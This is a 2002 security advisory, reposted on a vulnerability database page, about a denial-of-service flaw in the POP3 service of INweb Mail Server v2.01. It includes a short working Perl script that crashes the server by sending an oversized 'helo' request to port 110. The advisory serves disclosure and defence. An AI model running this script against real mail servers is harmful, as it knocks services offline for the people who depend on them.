Vulners
Lucene search
INwebMailServer.txt
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5
- --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]--
- --[ Type
Denial of Service
- --[ Release Date
November 12, 2002
- --[ Product / Vendor
The INweb Mail Server is a standard Internet POP3 and SMTP mail server that
runs flawlessly under Windows 2000 and NT and other windows platforms.
The INweb Mail Server provides numerous unique features for both small and
large businesses as well as ISP's. This includes many facilities to handle spam
and viruses.
http://www.inwebmail.com
- --[ Summary
Memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3
server included with INweb Mail Server does not properly handle some types
of requests. By submitting a maliciously crafted request to the POP3 server,
an attacker could crash the system, resulting in a denial of service.
- --[ Exploit
An exploit for this vulnerability exists and is available below.
==================== SNIP ====================
#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = "110";
$evil = "A" x 16000;
print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";
print "Attacking...\n";
print $socket "helo:$evil\n\n";
close($socket);
print "\nConnection closed. Finished.\n\n";
==================== SNIP ====================
- --[ Tested
INweb Mail Server v2.01 / Windows 2000 sp3
- --[ Vulnerable
INweb Mail Server v2.01 / Windows 2000 sp3
- --[ Disclaimer
http://www.securityoffice.net is not responsible for the misuse or illegal use
of any of the information and/or the software listed on this security advisory.
- --[ Author
Tamer Sahin
[email protected]
http://www.securityoffice.net
All our advisories can be viewed at http://www.securityoffice.net/articles/
Please send suggestions, updates, and comments to [email protected]
(c) 2002 SecurityOffice
This Security Advisory may be reproduced and distributed, provided that this
Security Advisory is not modified in any way and is attributed to SecurityOffice
and provided that such reproduction and distribution is performed for
non-commercial purposes.
Tamer Sahin
http://www.securityoffice.net
-----BEGIN PGP SIGNATURE-----
Version: 2.6
iQEVAwUAPdEmHPpL5ibJRTtBAQHvDAf/YO13r8TkwFMuYEXgdHxaTmRtkUGn1CX2
3biZlvU/9XU6Y36S3tPzVVQiQuhMcNJ3EyRMVHi5OcanrT6uOrp0jQExh5SRMPH/
Y4wPN0Pm+f7gLLxAjp1uuvKR/NwaMTkgklrxAyM3Ek/kqS4Vh4t87d/nohAzOKa2
nLoK2P39ngwTRF/Sg04xsAXDLd7/RQ/cC7z7I/DbFPa17OYBUhciw/+wYKe+bo4u
FvXXPhcQnq8g8EJWfq1qHbEMYdXJrmhRudzIyVWQBSuw9+jX5qjvfh/09ZqS1I+Q
Vvk556SO9/NF+mgMose0YZ/76Ck5ippZjgKzpppud1JfljV3D+YyiA==
=z6ly
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2002 00:00Current
7.4High risk
Vulners AI Score7.4